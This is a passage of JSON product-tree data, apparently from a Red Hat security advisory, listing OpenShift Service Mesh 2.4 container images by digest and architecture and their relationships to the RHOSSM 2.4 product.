"name": "openshift-service-mesh/istio-cni-rhel8@sha256:baa908c7ba436f9289ac6b5258db529e0819a2ae20ea3098e3c8c14f11bd915f_arm64",
"product_id": "openshift-service-mesh/istio-cni-rhel8@sha256:baa908c7ba436f9289ac6b5258db529e0819a2ae20ea3098e3c8c14f11bd915f_arm64",
"product_identification_helper": {
"purl": "pkg:oci/istio-cni-rhel8@sha256:baa908c7ba436f9289ac6b5258db529e0819a2ae20ea3098e3c8c14f11bd915f?arch=arm64\u0026repository_url=registry.redhat.io/openshift-service-mesh/istio-cni-rhel8\u0026tag=2.4.11-2"
}
}
},
{
"category": "product_version",
"name": "openshift-service-mesh/grafana-rhel8@sha256:71133dd62fbae99d9494c9fe23fd3bb1f7b2c01127a4672a7acecb448df15972_arm64",
"product": {
"name": "openshift-service-mesh/grafana-rhel8@sha256:71133dd62fbae99d9494c9fe23fd3bb1f7b2c01127a4672a7acecb448df15972_arm64",
"product_id": "openshift-service-mesh/grafana-rhel8@sha256:71133dd62fbae99d9494c9fe23fd3bb1f7b2c01127a4672a7acecb448df15972_arm64",
"product_identification_helper": {
"purl": "pkg:oci/grafana-rhel8@sha256:71133dd62fbae99d9494c9fe23fd3bb1f7b2c01127a4672a7acecb448df15972?arch=arm64\u0026repository_url=registry.redhat.io/openshift-service-mesh/grafana-rhel8\u0026tag=2.4.11-2"
}
}
},
{
"category": "product_version",
"name": "openshift-service-mesh/kiali-rhel8@sha256:2f2e9c6c51a8f40b028aa626c8e54d1bf090d59503481b1a748411d1279776b2_arm64",
"product": {
"name": "openshift-service-mesh/kiali-rhel8@sha256:2f2e9c6c51a8f40b028aa626c8e54d1bf090d59503481b1a748411d1279776b2_arm64",
"product_id": "openshift-service-mesh/kiali-rhel8@sha256:2f2e9c6c51a8f40b028aa626c8e54d1bf090d59503481b1a748411d1279776b2_arm64",
"product_identification_helper": {
"purl": "pkg:oci/kiali-rhel8@sha256:2f2e9c6c51a8f40b028aa626c8e54d1bf090d59503481b1a748411d1279776b2?arch=arm64\u0026repository_url=registry.redhat.io/openshift-service-mesh/kiali-rhel8\u0026tag=1.65.16-4"
}
}
},
{
"category": "product_version",
"name": "openshift-service-mesh/istio-must-gather-rhel8@sha256:eb32c35bc468dc0bee7570a7dc683e11de02e07dcffeb6b4167a73e9bfd0dd9e_arm64",
"product": {
"name": "openshift-service-mesh/istio-must-gather-rhel8@sha256:eb32c35bc468dc0bee7570a7dc683e11de02e07dcffeb6b4167a73e9bfd0dd9e_arm64",
"product_id": "openshift-service-mesh/istio-must-gather-rhel8@sha256:eb32c35bc468dc0bee7570a7dc683e11de02e07dcffeb6b4167a73e9bfd0dd9e_arm64",
"product_identification_helper": {
"purl": "pkg:oci/istio-must-gather-rhel8@sha256:eb32c35bc468dc0bee7570a7dc683e11de02e07dcffeb6b4167a73e9bfd0dd9e?arch=arm64\u0026repository_url=registry.redhat.io/openshift-service-mesh/istio-must-gather-rhel8\u0026tag=2.4.11-3"
}
}
},
{
"category": "product_version",
"name": "openshift-service-mesh/pilot-rhel8@sha256:31c138edef9a73b2e225c69972b91e6272b073d0c07718b51ff8024ef179f2e5_arm64",
"product": {
"name": "openshift-service-mesh/pilot-rhel8@sha256:31c138edef9a73b2e225c69972b91e6272b073d0c07718b51ff8024ef179f2e5_arm64",
"product_id": "openshift-service-mesh/pilot-rhel8@sha256:31c138edef9a73b2e225c69972b91e6272b073d0c07718b51ff8024ef179f2e5_arm64",
"product_identification_helper": {
"purl": "pkg:oci/pilot-rhel8@sha256:31c138edef9a73b2e225c69972b91e6272b073d0c07718b51ff8024ef179f2e5?arch=arm64\u0026repository_url=registry.redhat.io/openshift-service-mesh/pilot-rhel8\u0026tag=2.4.11-2"
}
}
},
{
"category": "product_version",
"name": "openshift-service-mesh/proxyv2-rhel8@sha256:981a3342696504fa87ae21268e0f32aa5cd85a74c596dac123a3a91e8fad5329_arm64",
"product": {
"name": "openshift-service-mesh/proxyv2-rhel8@sha256:981a3342696504fa87ae21268e0f32aa5cd85a74c596dac123a3a91e8fad5329_arm64",
"product_id": "openshift-service-mesh/proxyv2-rhel8@sha256:981a3342696504fa87ae21268e0f32aa5cd85a74c596dac123a3a91e8fad5329_arm64",
"product_identification_helper": {
"purl": "pkg:oci/proxyv2-rhel8@sha256:981a3342696504fa87ae21268e0f32aa5cd85a74c596dac123a3a91e8fad5329?arch=arm64\u0026repository_url=registry.redhat.io/openshift-service-mesh/proxyv2-rhel8\u0026tag=2.4.11-5"
}
}
},
{
"category": "product_version",
"name": "openshift-service-mesh/ratelimit-rhel8@sha256:ac3c9594ceeb9414878ea612339cd4dd70afe536cd7d5f97e88c39b4388f0dbe_arm64",
"product": {
"name": "openshift-service-mesh/ratelimit-rhel8@sha256:ac3c9594ceeb9414878ea612339cd4dd70afe536cd7d5f97e88c39b4388f0dbe_arm64",
"product_id": "openshift-service-mesh/ratelimit-rhel8@sha256:ac3c9594ceeb9414878ea612339cd4dd70afe536cd7d5f97e88c39b4388f0dbe_arm64",
"product_identification_helper": {
"purl": "pkg:oci/ratelimit-rhel8@sha256:ac3c9594ceeb9414878ea612339cd4dd70afe536cd7d5f97e88c39b4388f0dbe?arch=arm64\u0026repository_url=registry.redhat.io/openshift-service-mesh/ratelimit-rhel8\u0026tag=2.4.11-2"
}
}
}
],
"category": "architecture",
"name": "arm64"
},
{
"branches": [
{
"category": "product_version",
"name": "openshift-service-mesh/istio-cni-rhel8@sha256:7423b83773835e7d4cfbe5618e7338fb62e41066aefd69f894900888a658d7a6_ppc64le",
"product": {
"name": "openshift-service-mesh/istio-cni-rhel8@sha256:7423b83773835e7d4cfbe5618e7338fb62e41066aefd69f894900888a658d7a6_ppc64le",
"product_id": "openshift-service-mesh/istio-cni-rhel8@sha256:7423b83773835e7d4cfbe5618e7338fb62e41066aefd69f894900888a658d7a6_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/istio-cni-rhel8@sha256:7423b83773835e7d4cfbe5618e7338fb62e41066aefd69f894900888a658d7a6?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift-service-mesh/istio-cni-rhel8\u0026tag=2.4.11-2"
}
}
},
{
"category": "product_version",
"name": "openshift-service-mesh/grafana-rhel8@sha256:2e77f63106ba54fb53734eb8e93431894d2dcd91f0bab4b11f14a98483386293_ppc64le",
"product": {
"name": "openshift-service-mesh/grafana-rhel8@sha256:2e77f63106ba54fb53734eb8e93431894d2dcd91f0bab4b11f14a98483386293_ppc64le",
"product_id": "openshift-service-mesh/grafana-rhel8@sha256:2e77f63106ba54fb53734eb8e93431894d2dcd91f0bab4b11f14a98483386293_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/grafana-rhel8@sha256:2e77f63106ba54fb53734eb8e93431894d2dcd91f0bab4b11f14a98483386293?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift-service-mesh/grafana-rhel8\u0026tag=2.4.11-2"
}
}
},
{
"category": "product_version",
"name": "openshift-service-mesh/kiali-rhel8@sha256:05bdfe2430b6ffbdeb92f266460252924cc900fd2a70472fd4243cf1daaa49a5_ppc64le",
"product": {
"name": "openshift-service-mesh/kiali-rhel8@sha256:05bdfe2430b6ffbdeb92f266460252924cc900fd2a70472fd4243cf1daaa49a5_ppc64le",
"product_id": "openshift-service-mesh/kiali-rhel8@sha256:05bdfe2430b6ffbdeb92f266460252924cc900fd2a70472fd4243cf1daaa49a5_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/kiali-rhel8@sha256:05bdfe2430b6ffbdeb92f266460252924cc900fd2a70472fd4243cf1daaa49a5?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift-service-mesh/kiali-rhel8\u0026tag=1.65.16-4"
}
}
},
{
"category": "product_version",
"name": "openshift-service-mesh/istio-must-gather-rhel8@sha256:cef9723c32c6183fcfee561c3dd2562e021f4db8db6c0073a9000c43265cb1b0_ppc64le",
"product": {
"name": "openshift-service-mesh/istio-must-gather-rhel8@sha256:cef9723c32c6183fcfee561c3dd2562e021f4db8db6c0073a9000c43265cb1b0_ppc64le",
"product_id": "openshift-service-mesh/istio-must-gather-rhel8@sha256:cef9723c32c6183fcfee561c3dd2562e021f4db8db6c0073a9000c43265cb1b0_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/istio-must-gather-rhel8@sha256:cef9723c32c6183fcfee561c3dd2562e021f4db8db6c0073a9000c43265cb1b0?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift-service-mesh/istio-must-gather-rhel8\u0026tag=2.4.11-3"
}
}
},
{
"category": "product_version",
"name": "openshift-service-mesh/pilot-rhel8@sha256:afa11a535d8dac276bcc81d6f04ad0e7be6bef126c1d5c92accdef5f675dc69f_ppc64le",
"product": {
"name": "openshift-service-mesh/pilot-rhel8@sha256:afa11a535d8dac276bcc81d6f04ad0e7be6bef126c1d5c92accdef5f675dc69f_ppc64le",
"product_id": "openshift-service-mesh/pilot-rhel8@sha256:afa11a535d8dac276bcc81d6f04ad0e7be6bef126c1d5c92accdef5f675dc69f_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/pilot-rhel8@sha256:afa11a535d8dac276bcc81d6f04ad0e7be6bef126c1d5c92accdef5f675dc69f?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift-service-mesh/pilot-rhel8\u0026tag=2.4.11-2"
}
}
},
{
"category": "product_version",
"name": "openshift-service-mesh/proxyv2-rhel8@sha256:cdf06c67f72b263ef3ac34205509eebbfe3cdee72919560c1de958678295c2b5_ppc64le",
"product": {
"name": "openshift-service-mesh/proxyv2-rhel8@sha256:cdf06c67f72b263ef3ac34205509eebbfe3cdee72919560c1de958678295c2b5_ppc64le",
"product_id": "openshift-service-mesh/proxyv2-rhel8@sha256:cdf06c67f72b263ef3ac34205509eebbfe3cdee72919560c1de958678295c2b5_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/proxyv2-rhel8@sha256:cdf06c67f72b263ef3ac34205509eebbfe3cdee72919560c1de958678295c2b5?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift-service-mesh/proxyv2-rhel8\u0026tag=2.4.11-5"
}
}
},
{
"category": "product_version",
"name": "openshift-service-mesh/ratelimit-rhel8@sha256:c07e83323755fcab6ea7942ce8597f6da29b136a23164bb2e818fb6b82cfaa67_ppc64le",
"product": {
"name": "openshift-service-mesh/ratelimit-rhel8@sha256:c07e83323755fcab6ea7942ce8597f6da29b136a23164bb2e818fb6b82cfaa67_ppc64le",
"product_id": "openshift-service-mesh/ratelimit-rhel8@sha256:c07e83323755fcab6ea7942ce8597f6da29b136a23164bb2e818fb6b82cfaa67_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/ratelimit-rhel8@sha256:c07e83323755fcab6ea7942ce8597f6da29b136a23164bb2e818fb6b82cfaa67?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift-service-mesh/ratelimit-rhel8\u0026tag=2.4.11-2"
}
}
}
],
"category": "architecture",
"name": "ppc64le"
},
{
"branches": [
{
"category": "product_version",
"name": "openshift-service-mesh/istio-cni-rhel8@sha256:724008ca455a9a604566e9ca40c6d133466f18c82c27ea7826956a5cf928943a_s390x",
"product": {
"name": "openshift-service-mesh/istio-cni-rhel8@sha256:724008ca455a9a604566e9ca40c6d133466f18c82c27ea7826956a5cf928943a_s390x",
"product_id": "openshift-service-mesh/istio-cni-rhel8@sha256:724008ca455a9a604566e9ca40c6d133466f18c82c27ea7826956a5cf928943a_s390x",
"product_identification_helper": {
"purl": "pkg:oci/istio-cni-rhel8@sha256:724008ca455a9a604566e9ca40c6d133466f18c82c27ea7826956a5cf928943a?arch=s390x\u0026repository_url=registry.redhat.io/openshift-service-mesh/istio-cni-rhel8\u0026tag=2.4.11-2"
}
}
},
{
"category": "product_version",
"name": "openshift-service-mesh/grafana-rhel8@sha256:9a6c7a3afacb314f8a95f37df0b7cf308be68bb43690d545c4afabadfa3a620c_s390x",
"product": {
"name": "openshift-service-mesh/grafana-rhel8@sha256:9a6c7a3afacb314f8a95f37df0b7cf308be68bb43690d545c4afabadfa3a620c_s390x",
"product_id": "openshift-service-mesh/grafana-rhel8@sha256:9a6c7a3afacb314f8a95f37df0b7cf308be68bb43690d545c4afabadfa3a620c_s390x",
"product_identification_helper": {
"purl": "pkg:oci/grafana-rhel8@sha256:9a6c7a3afacb314f8a95f37df0b7cf308be68bb43690d545c4afabadfa3a620c?arch=s390x\u0026repository_url=registry.redhat.io/openshift-service-mesh/grafana-rhel8\u0026tag=2.4.11-2"
}
}
},
{
"category": "product_version",
"name": "openshift-service-mesh/kiali-rhel8@sha256:c84cac102698963002273f11ae476d39fcf73df4cba3a7ee42cdc7d7c357ce0c_s390x",
"product": {
"name": "openshift-service-mesh/kiali-rhel8@sha256:c84cac102698963002273f11ae476d39fcf73df4cba3a7ee42cdc7d7c357ce0c_s390x",
"product_id": "openshift-service-mesh/kiali-rhel8@sha256:c84cac102698963002273f11ae476d39fcf73df4cba3a7ee42cdc7d7c357ce0c_s390x",
"product_identification_helper": {
"purl": "pkg:oci/kiali-rhel8@sha256:c84cac102698963002273f11ae476d39fcf73df4cba3a7ee42cdc7d7c357ce0c?arch=s390x\u0026repository_url=registry.redhat.io/openshift-service-mesh/kiali-rhel8\u0026tag=1.65.16-4"
}
}
},
{
"category": "product_version",
"name": "openshift-service-mesh/istio-must-gather-rhel8@sha256:49f616b946db7539d70f7e88262c401be1bbcd7f17131f2770e7808094186b76_s390x",
"product": {
"name": "openshift-service-mesh/istio-must-gather-rhel8@sha256:49f616b946db7539d70f7e88262c401be1bbcd7f17131f2770e7808094186b76_s390x",
"product_id": "openshift-service-mesh/istio-must-gather-rhel8@sha256:49f616b946db7539d70f7e88262c401be1bbcd7f17131f2770e7808094186b76_s390x",
"product_identification_helper": {
"purl": "pkg:oci/istio-must-gather-rhel8@sha256:49f616b946db7539d70f7e88262c401be1bbcd7f17131f2770e7808094186b76?arch=s390x\u0026repository_url=registry.redhat.io/openshift-service-mesh/istio-must-gather-rhel8\u0026tag=2.4.11-3"
}
}
},
{
"category": "product_version",
"name": "openshift-service-mesh/pilot-rhel8@sha256:f2eca6cadd2e62b3bfd4561cd8d08cb8f1c24f676920078b92a2f17ed3d85525_s390x",
"product": {
"name": "openshift-service-mesh/pilot-rhel8@sha256:f2eca6cadd2e62b3bfd4561cd8d08cb8f1c24f676920078b92a2f17ed3d85525_s390x",
"product_id": "openshift-service-mesh/pilot-rhel8@sha256:f2eca6cadd2e62b3bfd4561cd8d08cb8f1c24f676920078b92a2f17ed3d85525_s390x",
"product_identification_helper": {
"purl": "pkg:oci/pilot-rhel8@sha256:f2eca6cadd2e62b3bfd4561cd8d08cb8f1c24f676920078b92a2f17ed3d85525?arch=s390x\u0026repository_url=registry.redhat.io/openshift-service-mesh/pilot-rhel8\u0026tag=2.4.11-2"
}
}
},
{
"category": "product_version",
"name": "openshift-service-mesh/proxyv2-rhel8@sha256:77299b80d61d8792f7477325c2dcead898c1977c79c4dff34a5c7dfd74804c39_s390x",
"product": {
"name": "openshift-service-mesh/proxyv2-rhel8@sha256:77299b80d61d8792f7477325c2dcead898c1977c79c4dff34a5c7dfd74804c39_s390x",
"product_id": "openshift-service-mesh/proxyv2-rhel8@sha256:77299b80d61d8792f7477325c2dcead898c1977c79c4dff34a5c7dfd74804c39_s390x",
"product_identification_helper": {
"purl": "pkg:oci/proxyv2-rhel8@sha256:77299b80d61d8792f7477325c2dcead898c1977c79c4dff34a5c7dfd74804c39?arch=s390x\u0026repository_url=registry.redhat.io/openshift-service-mesh/proxyv2-rhel8\u0026tag=2.4.11-5"
}
}
},
{
"category": "product_version",
"name": "openshift-service-mesh/ratelimit-rhel8@sha256:2d2c3dd2aaf72a111aeb9e5d4b4b61685327af3ca7718f0c205ac2d2d0fcbb1c_s390x",
"product": {
"name": "openshift-service-mesh/ratelimit-rhel8@sha256:2d2c3dd2aaf72a111aeb9e5d4b4b61685327af3ca7718f0c205ac2d2d0fcbb1c_s390x",
"product_id": "openshift-service-mesh/ratelimit-rhel8@sha256:2d2c3dd2aaf72a111aeb9e5d4b4b61685327af3ca7718f0c205ac2d2d0fcbb1c_s390x",
"product_identification_helper": {
"purl": "pkg:oci/ratelimit-rhel8@sha256:2d2c3dd2aaf72a111aeb9e5d4b4b61685327af3ca7718f0c205ac2d2d0fcbb1c?arch=s390x\u0026repository_url=registry.redhat.io/openshift-service-mesh/ratelimit-rhel8\u0026tag=2.4.11-2"
}
}
}
],
"category": "architecture",
"name": "s390x"
},
{
"branches": [
{
"category": "product_version",
"name": "openshift-service-mesh/istio-cni-rhel8@sha256:826840b00f91d89aa9520ceac0536668ff0465c819df3a3ca346ab343071d42f_amd64",
"product": {
"name": "openshift-service-mesh/istio-cni-rhel8@sha256:826840b00f91d89aa9520ceac0536668ff0465c819df3a3ca346ab343071d42f_amd64",
"product_id": "openshift-service-mesh/istio-cni-rhel8@sha256:826840b00f91d89aa9520ceac0536668ff0465c819df3a3ca346ab343071d42f_amd64",
"product_identification_helper": {
"purl": "pkg:oci/istio-cni-rhel8@sha256:826840b00f91d89aa9520ceac0536668ff0465c819df3a3ca346ab343071d42f?arch=amd64\u0026repository_url=registry.redhat.io/openshift-service-mesh/istio-cni-rhel8\u0026tag=2.4.11-2"
}
}
},
{
"category": "product_version",
"name": "openshift-service-mesh/grafana-rhel8@sha256:7e27c85e14c08b6495ed6142155e7a94736fd729b5b261017e48afb7c003ecb2_amd64",
"product": {
"name": "openshift-service-mesh/grafana-rhel8@sha256:7e27c85e14c08b6495ed6142155e7a94736fd729b5b261017e48afb7c003ecb2_amd64",
"product_id": "openshift-service-mesh/grafana-rhel8@sha256:7e27c85e14c08b6495ed6142155e7a94736fd729b5b261017e48afb7c003ecb2_amd64",
"product_identification_helper": {
"purl": "pkg:oci/grafana-rhel8@sha256:7e27c85e14c08b6495ed6142155e7a94736fd729b5b261017e48afb7c003ecb2?arch=amd64\u0026repository_url=registry.redhat.io/openshift-service-mesh/grafana-rhel8\u0026tag=2.4.11-2"
}
}
},
{
"category": "product_version",
"name": "openshift-service-mesh/kiali-rhel8@sha256:afee81896a35fdadbe3f4434133f79bdb8f7c37b0aa8ddf0ab4cd2cde864132f_amd64",
"product": {
"name": "openshift-service-mesh/kiali-rhel8@sha256:afee81896a35fdadbe3f4434133f79bdb8f7c37b0aa8ddf0ab4cd2cde864132f_amd64",
"product_id": "openshift-service-mesh/kiali-rhel8@sha256:afee81896a35fdadbe3f4434133f79bdb8f7c37b0aa8ddf0ab4cd2cde864132f_amd64",
"product_identification_helper": {
"purl": "pkg:oci/kiali-rhel8@sha256:afee81896a35fdadbe3f4434133f79bdb8f7c37b0aa8ddf0ab4cd2cde864132f?arch=amd64\u0026repository_url=registry.redhat.io/openshift-service-mesh/kiali-rhel8\u0026tag=1.65.16-4"
}
}
},
{
"category": "product_version",
"name": "openshift-service-mesh/istio-must-gather-rhel8@sha256:e2ef0cab4f5aad815ee827d739a1452761fcdaf2e2d8ad88fbe35d3d9dd43b23_amd64",
"product": {
"name": "openshift-service-mesh/istio-must-gather-rhel8@sha256:e2ef0cab4f5aad815ee827d739a1452761fcdaf2e2d8ad88fbe35d3d9dd43b23_amd64",
"product_id": "openshift-service-mesh/istio-must-gather-rhel8@sha256:e2ef0cab4f5aad815ee827d739a1452761fcdaf2e2d8ad88fbe35d3d9dd43b23_amd64",
"product_identification_helper": {
"purl": "pkg:oci/istio-must-gather-rhel8@sha256:e2ef0cab4f5aad815ee827d739a1452761fcdaf2e2d8ad88fbe35d3d9dd43b23?arch=amd64\u0026repository_url=registry.redhat.io/openshift-service-mesh/istio-must-gather-rhel8\u0026tag=2.4.11-3"
}
}
},
{
"category": "product_version",
"name": "openshift-service-mesh/pilot-rhel8@sha256:ca7374e5fd181649245562b75eb6f0f7a232817ba83b4f5fd73a7144f8a41e30_amd64",
"product": {
"name": "openshift-service-mesh/pilot-rhel8@sha256:ca7374e5fd181649245562b75eb6f0f7a232817ba83b4f5fd73a7144f8a41e30_amd64",
"product_id": "openshift-service-mesh/pilot-rhel8@sha256:ca7374e5fd181649245562b75eb6f0f7a232817ba83b4f5fd73a7144f8a41e30_amd64",
"product_identification_helper": {
"purl": "pkg:oci/pilot-rhel8@sha256:ca7374e5fd181649245562b75eb6f0f7a232817ba83b4f5fd73a7144f8a41e30?arch=amd64\u0026repository_url=registry.redhat.io/openshift-service-mesh/pilot-rhel8\u0026tag=2.4.11-2"
}
}
},
{
"category": "product_version",
"name": "openshift-service-mesh/proxyv2-rhel8@sha256:b5181f27a7cfbb72d25979aa7bacc2916c83160f43be423db540f670a615ca53_amd64",
"product": {
"name": "openshift-service-mesh/proxyv2-rhel8@sha256:b5181f27a7cfbb72d25979aa7bacc2916c83160f43be423db540f670a615ca53_amd64",
"product_id": "openshift-service-mesh/proxyv2-rhel8@sha256:b5181f27a7cfbb72d25979aa7bacc2916c83160f43be423db540f670a615ca53_amd64",
"product_identification_helper": {
"purl": "pkg:oci/proxyv2-rhel8@sha256:b5181f27a7cfbb72d25979aa7bacc2916c83160f43be423db540f670a615ca53?arch=amd64\u0026repository_url=registry.redhat.io/openshift-service-mesh/proxyv2-rhel8\u0026tag=2.4.11-5"
}
}
},
{
"category": "product_version",
"name": "openshift-service-mesh/ratelimit-rhel8@sha256:c9a3312e373b9711b6017c939a124220e9635572f7435c5ece2be5c65d733cf6_amd64",
"product": {
"name": "openshift-service-mesh/ratelimit-rhel8@sha256:c9a3312e373b9711b6017c939a124220e9635572f7435c5ece2be5c65d733cf6_amd64",
"product_id": "openshift-service-mesh/ratelimit-rhel8@sha256:c9a3312e373b9711b6017c939a124220e9635572f7435c5ece2be5c65d733cf6_amd64",
"product_identification_helper": {
"purl": "pkg:oci/ratelimit-rhel8@sha256:c9a3312e373b9711b6017c939a124220e9635572f7435c5ece2be5c65d733cf6?arch=amd64\u0026repository_url=registry.redhat.io/openshift-service-mesh/ratelimit-rhel8\u0026tag=2.4.11-2"
}
}
}
],
"category": "architecture",
"name": "amd64"
}
],
"category": "vendor",
"name": "Red Hat"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-service-mesh/grafana-rhel8@sha256:2e77f63106ba54fb53734eb8e93431894d2dcd91f0bab4b11f14a98483386293_ppc64le as a component of RHOSSM 2.4 for RHEL 8",
"product_id": "8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:2e77f63106ba54fb53734eb8e93431894d2dcd91f0bab4b11f14a98483386293_ppc64le"
},
"product_reference": "openshift-service-mesh/grafana-rhel8@sha256:2e77f63106ba54fb53734eb8e93431894d2dcd91f0bab4b11f14a98483386293_ppc64le",
"relates_to_product_reference": "8Base-RHOSSM-2.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-service-mesh/grafana-rhel8@sha256:71133dd62fbae99d9494c9fe23fd3bb1f7b2c01127a4672a7acecb448df15972_arm64 as a component of RHOSSM 2.4 for RHEL 8",
"product_id": "8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:71133dd62fbae99d9494c9fe23fd3bb1f7b2c01127a4672a7acecb448df15972_arm64"
},
"product_reference": "openshift-service-mesh/grafana-rhel8@sha256:71133dd62fbae99d9494c9fe23fd3bb1f7b2c01127a4672a7acecb448df15972_arm64",
"relates_to_product_reference": "8Base-RHOSSM-2.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-service-mesh/grafana-rhel8@sha256:7e27c85e14c08b6495ed6142155e7a94736fd729b5b261017e48afb7c003ecb2_amd64 as a component of RHOSSM 2.4 for RHEL 8",
"product_id": "8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:7e27c85e14c08b6495ed6142155e7a94736fd729b5b261017e48afb7c003ecb2_amd64"
},
"product_reference": "openshift-service-mesh/grafana-rhel8@sha256:7e27c85e14c08b6495ed6142155e7a94736fd729b5b261017e48afb7c003ecb2_amd64",
"relates_to_product_reference": "8Base-RHOSSM-2.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-service-mesh/grafana-rhel8@sha256:9a6c7a3afacb314f8a95f37df0b7cf308be68bb43690d545c4afabadfa3a620c_s390x as a component of RHOSSM 2.4 for RHEL 8",
"product_id": "8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:9a6c7a3afacb314f8a95f37df0b7cf308be68bb43690d545c4afabadfa3a620c_s390x"
},
"product_reference": "openshift-service-mesh/grafana-rhel8@sha256:9a6c7a3afacb314f8a95f37df0b7cf308be68bb43690d545c4afabadfa3a620c_s390x",
"relates_to_product_reference": "8Base-RHOSSM-2.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-service-mesh/istio-cni-rhel8@sha256:724008ca455a9a604566e9ca40c6d133466f18c82c27ea7826956a5cf928943a_s390x as a component of RHOSSM 2.4 for RHEL 8",
"product_id": "8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:724008ca455a9a604566e9ca40c6d133466f18c82c27ea7826956a5cf928943a_s390x"
},
"product_reference": "openshift-service-mesh/istio-cni-rhel8@sha256:724008ca455a9a604566e9ca40c6d133466f18c82c27ea7826956a5cf928943a_s390x",
"relates_to_product_reference": "8Base-RHOSSM-2.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-service-mesh/istio-cni-rhel8@sha256:7423b83773835e7d4cfbe5618e7338fb62e41066aefd69f894900888a658d7a6_ppc64le as a component of RHOSSM 2.4 for RHEL 8",
"product_id": "8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:7423b83773835e7d4cfbe5618e7338fb62e41066aefd69f894900888a658d7a6_ppc64le"
},
"product_reference": "openshift-service-mesh/istio-cni-rhel8@sha256:7423b83773835e7d4cfbe5618e7338fb62e41066aefd69f894900888a658d7a6_ppc64le",
"relates_to_product_reference": "8Base-RHOSSM-2.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-service-mesh/istio-cni-rhel8@sha256:826840b00f91d89aa9520ceac0536668ff0465c819df3a3ca346ab343071d42f_amd64 as a component of RHOSSM 2.4 for RHEL 8",
"product_id": "8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:826840b00f91d89aa9520ceac0536668ff0465c819df3a3ca346ab343071d42f_amd64"
},
"product_reference": "openshift-service-mesh/istio-cni-rhel8@sha256:826840b00f91d89aa9520ceac0536668ff0465c819df3a3ca346ab343071d42f_amd64",
"relates_to_product_reference": "8Base-RHOSSM-2.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-service-mesh/istio-cni-rhel8@sha256:baa908c7ba436f9289ac6b5258db529e0819a2ae20ea3098e3c8c14f11bd915f_arm64 as a component of RHOSSM 2.4 for RHEL 8",
"product_id": "8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:baa908c7ba436f9289ac6b5258db529e0819a2ae20ea3098e3c8c14f11bd915f_arm64"
},
"product_reference": "openshift-service-mesh/istio-cni-rhel8@sha256:baa908c7ba436f9289ac6b5258db529e0819a2ae20ea3098e3c8c14f11bd915f_arm64",
"relates_to_product_reference": "8Base-RHOSSM-2.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-service-mesh/istio-must-gather-rhel8@sha256:49f616b946db7539d70f7e88262c401be1bbcd7f17131f2770e7808094186b76_s390x as a component of RHOSSM 2.4 for RHEL 8",
"product_id": "8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:49f616b946db7539d70f7e88262c401be1bbcd7f17131f2770e7808094186b76_s390x"
},
"product_reference": "openshift-service-mesh/istio-must-gather-rhel8@sha256:49f616b946db7539d70f7e88262c401be1bbcd7f17131f2770e7808094186b76_s390x",
"relates_to_product_reference": "8Base-RHOSSM-2.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-service-mesh/istio-must-gather-rhel8@sha256:cef9723c32c6183fcfee561c3dd2562e021f4db8db6c0073a9000c43265cb1b0_ppc64le as a component of RHOSSM 2.4 for RHEL 8",
"product_id": "8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:cef9723c32c6183fcfee561c3dd2562e021f4db8db6c0073a9000c43265cb1b0_ppc64le"
},
"product_reference": "openshift-service-mesh/istio-must-gather-rhel8@sha256:cef9723c32c6183fcfee561c3dd2562e021f4db8db6c0073a9000c43265cb1b0_ppc64le",
"relates_to_product_reference": "8Base-RHOSSM-2.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-service-mesh/istio-must-gather-rhel8@sha256:e2ef0cab4f5aad815ee827d739a1452761fcdaf2e2d8ad88fbe35d3d9dd43b23_amd64 as a component of RHOSSM 2.4 for RHEL 8",
"product_id": "8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:e2ef0cab4f5aad815ee827d739a1452761fcdaf2e2d8ad88fbe35d3d9dd43b23_amd64"
},
"product_reference": "openshift-service-mesh/istio-must-gather-rhel8@sha256:e2ef0cab4f5aad815ee827d739a1452761fcdaf2e2d8ad88fbe35d3d9dd43b23_amd64",
"relates_to_product_reference": "8Base-RHOSSM-2.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-service-mesh/istio-must-gather-rhel8@sha256:eb32c35bc468dc0bee7570a7dc683e11de02e07dcffeb6b4167a73e9bfd0dd9e_arm64 as a component of RHOSSM 2.4 for RHEL 8",
"product_id": "8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:eb32c35bc468dc0bee7570a7dc683e11de02e07dcffeb6b4167a73e9bfd0dd9e_arm64"
},
